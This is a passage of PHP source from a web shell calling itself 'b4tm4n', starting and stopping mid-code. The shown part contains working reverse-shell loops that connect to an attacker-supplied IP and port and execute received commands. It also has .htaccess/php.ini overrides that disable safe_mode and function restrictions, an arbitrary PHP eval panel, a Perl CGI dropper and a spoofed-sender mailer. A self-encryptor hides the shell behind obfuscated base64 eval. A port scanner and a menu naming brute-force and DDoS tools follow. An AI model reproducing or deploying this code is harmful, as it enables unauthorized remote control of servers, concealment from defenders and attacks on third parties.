2333 printf("<font color='red'><b>%s</b>:%s</font>",$errno,$errstr);
2334 }
2335 else
2336 {
2337 while(!feof($sock))
2338 {
2339 fwrite($sock,"[b4tm4n]:");
2340 $command=fgets($sock,1024);
2341 if(trim($command)=='quit'||trim($command)=='exit')
2342 {
2343 fclose($sock);
2344 printf($command);
2345 exit;
2346 }
2347 fwrite($sock,Execute($command));
2348 }
2349 fclose($sock);
2350 }
2351 }
2352 else if($_REQUEST['socket']=="socket_create")
2353 {
2354 $host=$_REQUEST['reverse-ip'];
2355 $port=$_REQUEST['reverse-port'];
2356 $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
2357 socket_set_nonblock($sock);
2358 if(!$sock)
2359 {
2360 printf("<font color='red'>Connection Error</font>");
2361 }
2362 else
2363 {
2364 while(!@socket_connect($sock,$host,$port))
2365 {
2366 @socket_write($sock,"[b4tm4n]:",strlen ("[b4tm4n]:"));
2367 $input=@socket_read($sock,1024,PHP_NORMAL_READ);
2368 if (trim($input)=='quit'||trim($input)=='exit')
2369 {
2370 socket_set_block($sock);
2371 socket_close($sock);
2372 printf($input);
2373 exit;
2374 }
2375 @socket_write($sock,Execute($input),strlen (Execute($input)));
2376 }
2377 socket_set_block($sock);
2378 socket_close($sock);
2379 }
2380 }
2381 else if($_REQUEST['socket']=="stream_socket_client")
2382 {
2383 $host=$_REQUEST['reverse-ip'];
2384 $port=$_REQUEST['reverse-port'];
2385 $sock=@stream_socket_client("tcp://$host:$port",$errno,$errstr);
2386 if (!$sock)
2387 {
2388 printf("<font color='red'><b>%s</b>:%s</font>",$errno,$errstr);
2389 }
2390 else
2391 {
2392 while(!feof($sock))
2393 {
2394 fwrite($sock,"[b4tm4n]:");
2395 $command=fgets($sock,1024);
2396 if(trim($command)=='quit'||trim($command)=='exit')
2397 {
2398 fclose($sock);
2399 printf($command);
2400 exit;
2401 }
2402 fwrite($sock,Execute($command));
2403 }
2404 fclose($sock);
2405 }
2406 }
2407 }
2408 printf("</fieldset></div></div></div></div>");
2409 }
2410 if($_REQUEST['x']=="htaccess")
2411 {
2412 $php_ini=array(
2413 "php_value upload_max_filesize 32M",
2414 "php_value post_max_size 32M",
2415 "php_flag safe_mode Off",
2416 "php_value disable_functions null",
2417 "php_flag safe_mode_gid Off",
2418 "php_value open_basedir $dir",
2419 "php_flag register_globals On",
2420 "php_flag exec On",
2421 "php_flag shell_exec On");
2422
2423 $htaccess=array(
2424 "Options All",
2425 "Allow From All",
2426 "Satisfy Any");
2427
2428 printf("
2429 <div class='divide'>
2430 <div class='divide-left'>
2431 <textarea>%s</textarea>
2432 </div>
2433 <div class='divide-right'>
2434 <textarea>%s</textarea>
2435 </div>
2436 </div>",implode($php_ini,"\n"),implode($htaccess,"\n"));
2437 }
2438 if($_REQUEST['x']=="php")
2439 {
2440 $exp=array(
2441 "print_r(get_extension_funcs('Core'));",
2442 "print_r(get_loaded_extensions());",
2443 "print_r(ini_get_all('pcre'));",
2444 "print_r(ini_get_all());",
2445 "print_r(get_defined_constants());",
2446 "print_r(get_defined_functions());",
2447 "print_r(get_declared_classes());");
2448
2449 printf("<div id='php'>
2450 <form onsubmit='return false;'>
2451 <div class='php-left'>
2452 <textarea id='php-code' cols='122' rows='20'>%s</textarea>
2453 </div>
2454 <div class='php-right'>
2455 <textarea id='php-eval' cols='122' rows='20' readonly></textarea>
2456 </div>
2457 <input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&codex='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Inject'/>
2458 <input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&code='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Run'/>
2459 </form>
2460 </div>",implode($exp,"\n"));
2461
2462 if(any("code",$_REQUEST))
2463 {
2464 ob_clean();
2465 $code=trim($_REQUEST['code']);
2466 $evil=Evil($code);
2467 exit;
2468 }
2469 if(any("codex",$_REQUEST))
2470 {
2471 ob_clean();
2472 $code=trim($_REQUEST['codex']);
2473 $evil=Evil($code,true);
2474 exit;
2475 }
2476 }
2477 if($_REQUEST['x']=="perl")
2478 {
2479 print 'PHP Perl Class: '.(class_exists('Perl')?"<b class='on'>ON</b>":"<b class='off'>OFF</b>").'<br>';
2480
2481 if(Unix())
2482 {
2483 if(file_exists("/usr/bin/perl"))
2484 {
2485 $path_perl="/usr/bin/perl";
2486 }
2487 else
2488 {
2489 $path_perl="/usr/bin/env perl";
2490 }
2491 }
2492 else
2493 {
2494 if(file_exists("C:\\perl\bin\perl.exe"))
2495 {
2496 $path_perl="C:\\perl\bin\perl.exe";
2497 }
2498 elseif(file_exists("C:\\wamp\bin\perl.exe"))
2499 {
2500 $path_perl="C:\\wamp\bin\perl.exe";
2501 }
2502 elseif(file_exists("C:\\xampp\perl\bin\perl.exe"))
2503 {
2504 $path_perl="C:\\xampp\perl\bin\perl.exe";
2505 }
2506 }
2507
2508 $script=array(
2509 "#!$path_perl",
2510 "use strict;",
2511 "use warnings;",
2512 "use CGI;",
2513 "print CGI::header();",
2514 "print 'k4mpr3t on CGI';");
2515
2516 $htaccess=array(
2517 "Options +ExecCGI +SymLinksIfOwnerMatch",
2518 "DirectoryIndex index.ler",
2519 "AddType application/x-httpd-cgi .ler",
2520 "AddHandler cgi-script .ler");
2521
2522 $path=$dir._.'cgi-bin';
2523 $file=$path._.'perl.ler';
2524 $file2=$path._.'.htaccess';
2525
2526 $scripts=implode($script,"\n");
2527 $htaccesss=implode($htaccess,"\n");
2528
2529 if(!is_dir($path))
2530 {
2531 mkdir($path,0755);
2532 }
2533 if(!is_file($file))
2534 {
2535 $op=fopen($file,'w+');
2536 fwrite($op,$scripts);
2537 fclose($op);
2538 chmod($file,0755);
2539 }
2540 if(!is_file($file2))
2541 {
2542 $op=fopen($file2,'w+');
2543 fwrite($op,$htaccesss);
2544 fclose($op);
2545 chmod($file2,0755);
2546 }
2547
2548 $redirect=GetUrlFromPath($file);
2549 printf("Tested -> <a href='$redirect' target='_blank'><u>Link</u></a>");
2550
2551 if (class_exists('Perl'))
2552 {
2553 //$perl=Perl::getInstance();
2554 $perl=new Perl();
2555 $perl->eval("print \"Executing Perl code in PHP\n\"");
2556 print "Hello from PHP! ";
2557
2558 //$perl=new Perl();
2559 $perl->require($file);
2560 $val=$perl->somePhpFunc('test');
2561 print $val;
2562 }
2563 }
2564 if($_REQUEST['x']=="mail")
2565 {
2566 printf("
2567
2568 <div class='divide'>
2569 <div class='divide-left'>
2570 <fieldset>
2571 <legend>Mail</legend>
2572 <form onsubmit='return false;' class='mail'>
2573 <label>From</label><input type='text' id='email-from' placeholder='Attacker <very@handsome.com>' value='Attacker <very@handsome.com>'/><br>
2574 <label>Reply To</label><input type='text' id='email-reply' placeholder=very@handsome.com' value='very@handsome.com'/><br>
2575 <label>To</label><input type='text' id='email-to' placeholder='Target 1 <target1@target.com>,Target 2 <target2@target.com>' value=''/><br>
2576 <label>Cc</label><input type='text' id='email-cc' placeholder='target1@target.com,target2@target.com' value=''/><br>
2577 <label>Bcc</label><input type='text' id='email-bcc' placeholder='target1@target.com,target2@target.com' value=''/><br>
2578 <label>Subject</label><input type='text' id='email-subject' placeholder='What You Waiting For ?' value=''/><br>
2579 <label>Attachment (FIlename)</label><input type='text' id='email-attachment' placeholder='%s' value=''/><br>
2580 <label>Messages</label><input type='text' id='email-message'/><br>
2581 <input type='submit' value='Send' onclick=\"
2582
2583 getAjax(true,
2584 'send-result',
2585 'POST',
2586 '?x=mail&xa=send'+
2587 '&from='+document.getElementById('email-from').value+
2588 '&reply='+document.getElementById('email-reply').value+
2589 '&to='+document.getElementById('email-to').value+
2590 '&cc='+document.getElementById('email-cc').value+
2591 '&bcc='+document.getElementById('email-bcc').value+
2592 '&subject='+document.getElementById('email-subject').value+
2593 '&message='+document.getElementById('email-message').value+
2594 '&attachment='+document.getElementById('email-attachment').value);
2595
2596 \"/>
2597 </form>
2598 </fieldset>
2599 </div>
2600 <div class='divide-right'>
2601 <fieldset>
2602 <legend>Result's</legend>
2603 <div id='send-result'></div>
2604 </fieldset>
2605 </div>
2606 </div>
2607
2608 ",php_self);
2609
2610 if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send')
2611 {
2612 ob_clean();
2613 $from=$_REQUEST['from'];
2614 $reply=$_REQUEST['reply'];
2615 $to=$_REQUEST['to'];
2616 $cc=$_REQUEST['cc'];
2617 $bcc=$_REQUEST['bcc'];
2618 $subject=$_REQUEST['subject'];
2619 $msg=$_REQUEST['message'];
2620 $attachment=$_REQUEST['attachment'];
2621 $uid=md5(uniqid(time()));
2622
2623 $headers[]="From: $from";
2624 $headers[]="Reply-To: $reply";
2625 $headers[]="To: $to";
2626 if(!empty($cc)) $headers[]='Cc: $cc';
2627 if(!empty($bcc)) $headers[]='Bcc: $bcc';
2628 $headers[]="MIME-Version: 1.0";
2629 $headers[]="Content-Type: multipart/mixed; boundary=\"$uid\"";
2630
2631 $messages[]="--$uid";
2632 $messages[]="Content-type: text/html; charset=\"iso-8859-1\"";
2633 $messages[]="Content-Transfer-Encoding: 8bit";
2634 $messages[]="";
2635 $messages[]="$msg";
2636 $messages[]="";
2637
2638 if(is_file($attachment))
2639 {
2640 $content=file_get_contents($attachment);
2641 $content=chunk_split(B64E($content));
2642 $name=basename($attachment);
2643 $mime=mime_content_type($attachment);
2644
2645 $messages[]="--$uid";
2646 $messages[]="Content-Type: $mime; name=\"$name\"";
2647 $messages[]="Content-Transfer-Encoding: base64";
2648 $messages[]="Content-Disposition: attachment";
2649 $messages[]="";
2650 $messages[]="$content";
2651 $messages[]="";
2652 $messages[]="--$uid--";
2653 }
2654
2655 $message=implode("\r\n",$messages);
2656 $header=implode("\r\n",$headers);
2657
2658 if(mail($to,$subject,$message,$header))
2659 {
2660 print "Email Send";
2661 }
2662 else
2663 {
2664 $error=error_get_last();
2665 print "Error :" . $error['message'];
2666 }
2667 exit;
2668 }
2669 }
2670 if($_REQUEST['x']=='process')
2671 {
2672 printf("<div id='process-kill'><form class='new' method='post' action='?x=process&xa=kill'>
2673 <label>PID</label> <input type='text' name='pid'/>
2674 <input type='submit' value='Kill'/><br>
2675 <label>Name</label> <input type='text' name='name'/>
2676 <input type='submit' value='Kill'/>
2677 </form></div>");
2678
2679 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill")
2680 {
2681 $pid=$_REQUEST['pid'];
2682 $name=$_REQUEST['name'];
2683
2684 if(Unix())
2685 {
2686 $kill=Execute("kill 9 $pid");
2687 $kill=Execute("kill 9 $name");
2688 if($kill) print '<font class="off">Process Killed</font>';
2689 }
2690 else
2691 {
2692 $kill=Execute("taskkill /f /pid $pid");
2693 $kill=Execute("taskkill /f /im $name");
2694 if($kill) print '<font class="off">Process Killed</font>';
2695 }
2696 }
2697
2698 if(Unix())
2699 {
2700 $ret=iconv('UTF-8','UTF-8',Execute('ps aux'));
2701 print '<div id="process-list"><pre>'.$ret.'</pre></div>';
2702 }
2703 else
2704 {
2705 $ret=iconv('Windows-1251','UTF-8',Execute('tasklist'));
2706 print '<div id="process-list"><pre>'.$ret.'</pre></div>';
2707 }
2708 }
2709 if($_REQUEST['x']=='shells')
2710 {
2711 print "Coming Soon";
2712 }
2713 if($_REQUEST['x']=='symlink')
2714 {
2715 print "Coming Soon";
2716 }
2717 if($_REQUEST['x']=="account")
2718 {
2719 printf("<div id='account'><form class='new' method='post' action='?x=account&xa=change'>
2720 <label>Username</label> <input type='text' name='change-username' autocomplete='off' value='%s'/> <br>
2721 <label>Password</label> <input type='text' name='change-password' autocomplete='off'value=''/><br>
2722 <input type='submit' value='Change' onclick=\"return confirm('Sure ?');\"/>
2723 </form></div>",B64D($account[0]));
2724
2725 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change")
2726 {
2727 $filename=script_filename;
2728 $username=$_REQUEST['change-password'];
2729 $password=$_REQUEST['change-username'];
2730
2731 if (!empty($username)&&!empty($password))
2732 {
2733 $user_from=$account[0];
2734 $user_to=B64E($password);
2735 $content=file_get_contents($filename);
2736 $chunk=explode($user_from,$content);
2737 $content=implode($user_to,$chunk);
2738 $change=file_put_contents($filename,$content);
2739
2740 $pass_from=$account[1];
2741 $pass_to=sha1(md5($username));
2742 $content=file_get_contents($filename);
2743 $chunk=explode($pass_from,$content);
2744 $content=implode($pass_to,$chunk);
2745 $change=file_put_contents($filename,$content);
2746
2747 if($change)
2748 {
2749 session_destroy();
2750 session_regenerate_id();
2751 header('location:'.php_self);
2752 }
2753 else
2754 {
2755 printf("Error change account");
2756 }
2757 }
2758 else
2759 {
2760 printf("<b class='off'>Mistakes !</b>");
2761 }
2762 }
2763 }
2764 if($_REQUEST['x']=="action")
2765 {
2766 $files=any('chk',$_REQUEST)?$_REQUEST['chk']:array();
2767 $value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option'];
2768 $tmp="";
2769 $row="";
2770 $count_dirs=0;
2771 $count_files=0;
2772
2773 foreach($files as $file)
2774 {
2775 if(is_dir(urld($file)))
2776 {
2777 $count_dirs++;
2778 }
2779 if(is_file(urld($file)))
2780 {
2781 $count_files++;
2782 }
2783
2784 $row.="<tr><td>".urld($file)."</td></tr>";
2785 $tmp.=urld($file).",";
2786 }
2787
2788 if(count($files)==1&&$value=='copy')
2789 {
2790 header('location:'.php_self.'?a=cp&r='.$files[0]);
2791 }
2792
2793 if(count($files)==1&&$value=='move')
2794 {
2795 header('location:'.php_self.'?a=mv&r='.$files[0]);
2796 }
2797
2798 if(!any('xa',$_REQUEST)&&$value=='delete')
2799 {
2800 printf("<h4>Dir's: [%s] File's: [%s]</h4>
2801 <table class='table'>%s</table>
2802 <form class='new' method='post' action='?x=action&xa=option'>
2803 <input type='hidden' name='action-option' value='%s'/>
2804 <input type='hidden' name='tmp' value='%s'/>
2805 <input type='submit' value='Remove'/>
2806 </form>",
2807 $count_dirs,
2808 $count_files,
2809 $row,
2810 $value,
2811 $tmp);
2812 }
2813
2814 if(!any('xa',$_REQUEST)&&$value!='delete')
2815 {
2816 printf("<h4>Dir's: [%s] File's: [%s]</h4>
2817 <table class='table'>%s</table>
2818 <form class='new' method='post' action='?x=action&xa=option'>
2819 <script>window.onload=function(e){document.getElementById('action_option').value='%s'}</script>
2820 <select name='action-option' id='action_option'>
2821 <option value='copy'>Copy</option>
2822 <option value='move'>Move</option>
2823 <option value='zip'>Archive (zip)</option>
2824 <option value='unzip'>Extract to (zip)</option>
2825 </select>
2826 <i>-></i>
2827 <input type='hidden' name='tmp' value='%s'/>
2828 <input type='text' name='newloc' value='%s'/>
2829 <input type='submit' value='Process'/>
2830 </form>",
2831 $count_dirs,
2832 $count_files,
2833 $row,
2834 $value,
2835 $tmp,
2836 $dir._);
2837 }
2838
2839 if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option')
2840 {
2841 $files=array_filter(explode(',',$_REQUEST['tmp']));
2842 $newloc=trim(@$_REQUEST['newloc']);
2843 $succ=0;
2844 $fail=0;
2845
2846 if($_REQUEST['action-option']=='copy')
2847 {
2848 if(file_exists($newloc)&&is_dir($newloc))
2849 {
2850 foreach($files as $file)
2851 {
2852 if(CopyRecursive($file,rtrim($newloc,_)._.basename($file)))
2853 {
2854 $succ++;
2855 }
2856 else
2857 {
2858 $fail++;
2859 }
2860 }
2861 print "Success: $succ | Failed: $fail";
2862 }
2863 else
2864 {
2865 print "Target not exists !";
2866 }
2867 }
2868
2869 if($_REQUEST['action-option']=='move')
2870 {
2871 if(file_exists($newloc)&&is_dir($newloc))
2872 {
2873 foreach($files as $file)
2874 {
2875 if(MoveRecursive($file,rtrim($newloc,_)._.basename($file)))
2876 {
2877 $succ++;
2878 }
2879 else
2880 {
2881 $fail++;
2882 }
2883 }
2884 print "Success: $succ | Failed: $fail";
2885 }
2886 else
2887 {
2888 print "Target not exists !";
2889 }
2890 }
2891
2892 if($_REQUEST['action-option']=='delete')
2893 {
2894 foreach($files as $file)
2895 {
2896 if(Remove($file))
2897 {
2898 $succ++;
2899 }
2900 else
2901 {
2902 $fail++;
2903 }
2904 }
2905 print "Success: $succ | Failed: $fail";
2906 }
2907
2908 if($_REQUEST['action-option']=='zip')
2909 {
2910 if(pathinfo($newloc)['extension']=='zip')
2911 {
2912 $zip=new ZipArchive;
2913
2914 if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE)
2915 {
2916 foreach($files as $file)
2917 {
2918 if(is_dir($file))
2919 {
2920 $zip->addEmptyDir(basename($file));
2921
2922 $recur=new RecursiveIteratorIterator(
2923 new RecursiveDirectoryIterator($file),
2924 RecursiveIteratorIterator::LEAVES_ONLY
2925 );
2926
2927 foreach ($recur as $key => $val)
2928 {
2929 if(basename($key)!="..")
2930 {
2931 if(is_dir($key))
2932 {
2933 $zdir=str_replace($file,basename($file),realpath($key));
2934 $zip->addEmptyDir($zdir);
2935 }
2936 elseif(is_file($key))
2937 {
2938 $zfile=str_replace($file,basename($file),realpath($key));
2939 $zip->addFile(realpath($key),$zfile);
2940 }
2941 }
2942 }
2943 }
2944 elseif(is_file($file))
2945 {
2946 $zip->addFile($file,basename($file));
2947 }
2948 }
2949
2950 $zip->close();
2951 print 'Zip Created';
2952 }
2953 else
2954 {
2955 print 'Failed';
2956 }
2957 }
2958 else
2959 {
2960 print 'Extension must Zip';
2961 }
2962 }
2963
2964 if($_REQUEST['action-option']=='unzip')
2965 {
2966 if(file_exists($newloc)&&is_dir($newloc))
2967 {
2968 foreach($files as $file)
2969 {
2970 if(pathinfo($newloc)['extension']=='zip')
2971 {
2972 $zip=new ZipArchive;
2973
2974 if ($zip->open($file)===TRUE)
2975 {
2976 $zip->extractTo($newloc);
2977 $zip->close();
2978 $succ++;
2979 }
2980 else
2981 {
2982 $fail++;
2983 }
2984 }
2985 else
2986 {
2987 $fail++;
2988 }
2989
2990 }
2991 print "Success: $succ | Failed: $fail";
2992 }
2993 else
2994 {
2995 print "Target not exists !";
2996 }
2997 }
2998 }
2999 }
3000 if($_REQUEST['x']=="find")
3001 {
3002 $recur=new RecursiveIteratorIterator(
3003 new RecursiveDirectoryIterator($dir),
3004 RecursiveIteratorIterator::LEAVES_ONLY
3005 );
3006
3007 if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value']))
3008 {
3009 $result="";
3010 $res_=0;
3011
3012 foreach ($recur as $key => $val)
3013 {
3014 if(basename($key)!="..")
3015 {
3016 if(strpos(realpath($key),$_REQUEST['find-value'])!== false)
3017 {
3018 $result.=sprintf("<tr>
3019 <td></td>
3020 <td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>
3021 <td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>
3022 <td><center>%s</center></td>
3023 </tr>",
3024 substr(realpath($key),0,strrpos(realpath($key),_)),
3025 substr(realpath($key),0,strrpos(realpath($key),_)),
3026 substr(realpath($key),0,strrpos(realpath($key),_)),
3027 realpath($key),
3028 realpath($key),
3029 basename(realpath($key)),
3030 GetFileTime(realpath($key),'modify')
3031 );
3032
3033 $res_++;
3034 }
3035 }
3036 }
3037
3038 printf("
3039 <form class='new' method=POST action='?x=find'>
3040 <input type='text' name='find-value' id='find-action' value='%s'/><input type='submit' name='find-button' value='Find'/>
3041 <label style='margin-left:10px'><font class='on'>Find: '%s' | Found's: %s</font></label>
3042 </form>
3043 <div class='auto-number'>
3044 <table class='table sortable'>
3045 <thead>
3046 <tr>
3047 <th class='sorttable_nosort' width='15'>No.</th>
3048 <th>Directory</th>
3049 <th>Name</th>
3050 <th>Modified</th>
3051 </tr>
3052 <tbody>%s</tbody>
3053 </table>
3054 </div>",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result);
3055 }
3056 else
3057 {
3058 print "<form class='new' method=POST action='?x=find'>
3059 <input type='text' name='find-value'/><input type='submit' name='find-button' value='Find'/>
3060 <label style='margin-left:10px'><font color='red'>Whoops, Nothing to Found's !</font></label>
3061 </form>";
3062 }
3063 }
3064 if($_REQUEST['x']=="update")
3065 {
3066 $link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';
3067 $current_version=2.7; //New Version Released
3068
3069 if($config['debug']==true)
3070 {
3071 $latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1
3072 }
3073 else
3074 {
3075 $git_script=GetUrlContent($link_update);
3076 $get_version=strpos($git_script,"current_version");
3077 $version=substr($git_script,$get_version+16,3);
3078 $latest_version=is_numeric($version)?$version:$current_version;
3079 }
3080
3081 $status="";
3082 if((float)$latest_version>(float)$current_version)
3083 {
3084 if($config['debug']==true)
3085 {
3086 $status.='New Version Available '.$latest_version.'<br>Setting Debug to False for Activate this Feature';
3087 }
3088 else
3089 {
3090 $status.='New Version Available '.$latest_version.'<br>Download -> [<font class="on"><a href="'.$link_update.'" target="_blank">link</a></font>]';
3091 }
3092 }
3093 else
3094 {
3095 $status.='Latest Version '.$current_version;
3096 }
3097
3098 Printf("<div id='update'>
3099 <a href='https://www.gnu.org/licenses/gpl-3.0.txt' target='_blank' title='License'>
3100 <img src='https://www.gnu.org/graphics/lgplv3-88x31.png'/>
3101 </a><br><br>%s
3102 </div>",$status);
3103 }
3104 if($_REQUEST['x']=="self-encryptor")
3105 {
3106 if($php_script=htmlentities(@file_get_contents(__FILE__)))
3107 {
3108 $asu=strpos($php_script,$_SESSION["action"]["password"]);
3109 $temp=substr($php_script,$asu+48);
3110 $rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3));
3111 $rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5));
3112 $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
3113 $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
3114 $b64e=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
3115 $b64d=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_l.$_m.$_j.$_k.$_l.$_m;
3116 $b64=array(
3117 '"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"',
3118 'strrev("ed"."oce"."d_4"."6es"."ab")',
3119 'strrev("e"."doc"."ed_"."46e"."sab")',
3120 '"b"."as"."e6"."4_"."d"."ec"."o"."de"',
3121 '"ba"."se"."6"."4_d"."e"."cod"."e"'
3122 );
3123 $rand_b64=array_rand($b64);
3124 $rand3=$b64[$rand_b64];
3125 $var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";';
3126 $var2=$rand2.'='.$rand3.';';
3127 $var=array(
3128 $var1.$var2,
3129 $var2.$var1
3130 );
3131 $rand_var=array_rand($var);
3132 $rand4=$var[$rand_var];
3133 $self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random
3134 $src_='';
3135 $src_.='<?php ';
3136 $src_.=$rand4;
3137 $src_.='@eval('.$rand2.'("';
3138 $src_.=$b64e(htmlspecialchars_decode($self));
3139 $src_.='"))';
3140 $src_.='?>';
3141 $name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php';
3142 $file=dirname(__FILE__)._.$name;
3143 $op=fopen($file,'w+');
3144 fwrite($op,$src_);
3145 fclose($op);
3146 printf("<center class='on'>SELF ENCRYPT CREATED !!!</center>
3147 <center class='on'>
3148 Link -> <a href='%s' target='_blank'><u>%s</u></a>
3149 </center>",GetUrlFromPath($file),$name);
3150 }
3151 else
3152 {
3153 print "<center class='off'>SELF ENCRYPT ENABLE !!!</center>";
3154 }
3155 }
3156}
3157
3158/* START CUSTOM TOOLZ */
3159if(any("z",$_REQUEST))
3160{
3161 $z=$_REQUEST['z'];
3162
3163 print MenuTools(array(
3164 "target-map"=>array("title"=>"Target Map","ver"=>"2.0","auth"=>"k4mpr3t"),
3165 "port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"),
3166 "script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"),
3167 "encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"),
3168 "form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
3169 "login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
3170 "mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"),
3171 "ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"),
3172 ));
3173
3174 print "<div id='tools'>";
3175
3176 if(empty($z))
3177 {
3178 printf("<div id='thanks'>
3179 <h2>Nothing Is Secure...</h2>
3180 <h3>WHY SO serious ?!</h3>
3181 </div>");
3182 }
3183 if($z=="target-map")
3184 {
3185 print "<div class='tools-header'>
3186 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3187 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3188 </div>";
3189
3190 printf("<div id='target-map'>
3191 <form onsubmit='return false;' class='new'>
3192 <input type='text' id='map-ip' value='%s'/>
3193 <input type='submit' value='Trace' onclick=\"return getAjax(true,'target-info','POST','?z=target-map&ip='+document.getElementById('map-ip').value);\"/><br>
3194 </form>
3195 </div>
3196 <div id='target-info' class='result'></div>",gethostbyname(http_host));
3197
3198 if(any("ip",$_REQUEST))
3199 {
3200 ob_clean();
3201 $ip=!empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host);
3202 $valid=filter_var($ip,FILTER_VALIDATE_IP) or die('Invalid IP Address');
3203 if($_REQUEST['ip']==gethostbyname(http_host))
3204 {
3205 $url=B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=");
3206 $geoip=GetUrlContent($url);
3207 $json=json_decode($geoip,true);
3208 }
3209 else
3210 {
3211 $url=sprintf(B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=")."%s",$ip);
3212 $geoip=GetUrlContent($url);
3213 $json=json_decode($geoip,true);
3214 }
3215 $url=sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa")."?q=%s,%s&z=10&output=embed",$json['lat'],$json['lon']);
3216 printf("<div class='divide'>
3217 <div class='divide-left'>
3218 <table class='table'>
3219 <tr><td>AS</td><td>%s</td></tr>
3220 <tr><td>City</td><td>%s</td></tr>
3221 <tr><td>Country</td><td>%s</td></tr>
3222 <tr><td>Country Code</td><td>%s</td></tr>
3223 <tr><td>ISP</td><td>%s</td></tr>
3224 <tr><td>Latitude</td><td>%s</td></tr>
3225 <tr><td>Logitude</td><td>%s</td></tr>
3226 </table>
3227 </div>
3228 <div class='divide-left'>
3229 <table class='table'>
3230 <tr><td>Origin</td><td>%s</td></tr>
3231 <tr><td>IP</td><td>%s</td></tr>
3232 <tr><td>Region</td><td>%s</td></tr>
3233 <tr><td>Region Name</td><td>%s</td></tr>
3234 <tr><td>Timezone</td><td>%s</td></tr>
3235 <tr><td>Zip</td><td>%s</td></tr>
3236 <tr><td>Status</td><td>%s</td></tr>
3237 </table>
3238 </div>
3239 </div>
3240 <iframe src='%s' width='100%%' height='345' frameBorder='0'><iframe>",
3241 $json['as'],
3242 $json['city'],
3243 $json['country'],
3244 $json['countryCode'],
3245 $json['isp'],
3246 $json['lat'],
3247 $json['lon'],
3248 $json['org'],
3249 $json['query'],
3250 $json['region'],
3251 $json['regionName'],
3252 $json['timezone'],
3253 $json['zip'],
3254 $json['status'],
3255 $url);
3256 exit;
3257 }
3258 }
3259 if($z=="port-scanner")
3260 {
3261 print "<div class='tools-header'>
3262 <h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
3263 <h3> by: ".$menu_tools[$z]['auth']."</h3>
3264 </div>";
3265
3266 printf("<div id='port-scan'>
3267 <form onsubmit='return false;' class='new'>
3268 <label>Host Port</label><input type='text' id='ip-port' value='%s'/><br>
3269 <label>Start Port</label><input type='text' id='start-port' value='1'/><br>
3270 <label>End Port</label><input type='text' id='end-port' value='65535'/><br>
3271 <label>Methode</label><select id='scan-port'><option value='1'>socket_connect</option><option value='2'>fsockopen</option></select><br>
3272 <input type='submit' onclick=\"return getAjax(true,'port-result','POST','?z=port-scanner&x=scan-port&ip='+document.getElementById('ip-port').value+'&sp='+document.getElementById('start-port').value+'&ep='+document.getElementById('end-port').value+'&mtd='+document.getElementById('scan-port').value);\" value=Scan />
3273 <input type='submit' onclick=\"return ajaxAbort(true,'port-result')\" value=Cancel />
3274 </form>
3275 </div>
3276 <div id='port-result' class='result'></div>",gethostbyname(http_host));
3277
3278 if(any("x",$_REQUEST)&&$_REQUEST['x']=="scan-port")
3279 {
3280 ob_clean();
3281 $host=$_REQUEST['ip'];
3282 $from=$_REQUEST['sp'];
3283 $to =$_REQUEST['ep'];
3284 $mtd =$_REQUEST['mtd'];
3285 switch($mtd)
3286 {
3287 case '1':
3288 if(function_exists('socket_create'))
3289 {
3290 $socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);
3291 for($conn_port=$from;$conn_port <=$to;$conn_port++)
3292 {
3293 $conn=@socket_connect($socket ,$host,$conn_port);
3294 if($conn)
3295 {
3296 print "<br>port $conn_port open";
3297 socket_close($socket);
3298 $socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);
3299 }
3300 }
3301 }
3302 else
3303 {
3304 print "Error socket_connect<br>";
3305 }
3306 break;
3307 case '2':
3308 for($conn_port=$from;$conn_port <=$to;$conn_port++)
3309 {
3310 $conn=@fsockopen($host,$conn_port);
3311 if($conn)
3312 {
3313 print "<br>port $conn_port open";
